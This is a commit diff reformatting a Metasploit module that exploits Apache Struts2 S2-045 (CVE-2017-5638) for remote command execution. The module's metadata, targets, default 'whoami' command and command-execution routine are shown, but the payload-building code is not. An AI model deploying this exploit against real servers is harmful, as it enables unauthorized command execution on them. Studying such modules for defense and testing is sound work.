Struts2 S2-045 Exploit 2017/03/08

2017-03-08 14:26:33 +08:00 · 2017-03-08 14:26:33 +08:00 · c5fb69bd89
parent b73a884c05
commit c5fb69bd89
1 changed files with 67 additions and 80 deletions
--- a/modules/exploits/multi/http/struts2_s2045_rce.rb
+++ b/modules/exploits/multi/http/struts2_s2045_rce.rb
@ -1,32 +1,24 @@
-
-
 require 'msf/core'

 class MetasploitModule < Msf::Exploit::Remote
    Rank = ExcellentRanking
    include Msf::Exploit::Remote::HttpClient

-
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Apache Struts2 S2-045 Remote Code Execution Exploit(CVE-2017-5638)',
-      'Description'    => %q{
-          It is possible to perform a RCE attack with a malicious Content-Type value.If the Content-Type value isn't valid an exception is thrown which is then used to display an error message to a user.Discoverd By Nike.Zheng.
+            'Description'    => %q{It is possible to perform a RCE attack with a malicious Content-Type value.If the Content-Type value isn't valid an exception is thrown which is then used to display an error message to a user.Discoverd by Nike.Zheng.
            },
-      'Author'         => [ 'MSF Module: Chorder(http://chorder.net)'],
+            'Author'         => [ 'Exploit: Nike.Zheng','MSF Module: Chorder(http://chorder.net)'],
            'License'        => MSF_LICENSE,
-      'References'     =>
-        [
-          [ 'CVE', '2017-5638']
-        ],
+            'References'     => [ [ 'CVE', '2017-5638'] ],
            'Privileged'     => true,
            'Platform'       => %w{ linux win },
            'Arch'           => 'x86',
            'DefaultOptions' =>{
                'CMD' => 'whoami'
            },
-      'Targets'        =>
-        [
+            'Targets'        =>[
                ['Windows Universal',
                    {
                        'Arch' => ARCH_X86,
@ -43,7 +35,6 @@ class MetasploitModule < Msf::Exploit::Remote
            ],
            'DefaultTarget'  => 0,
            'DisclosureDate' => 'Mar 06 2017'))
-      
            register_options(
            [
                Opt::RPORT(8080),
@ -74,8 +65,6 @@ class MetasploitModule < Msf::Exploit::Remote
        print_status( resp.body )
    end

-
-
    def exploit
        unless datastore['CMD'].blank?
            print_status("Executing Command...")
@ -83,7 +72,5 @@ class MetasploitModule < Msf::Exploit::Remote
            return
        end
        handler
-    
    end
-
 end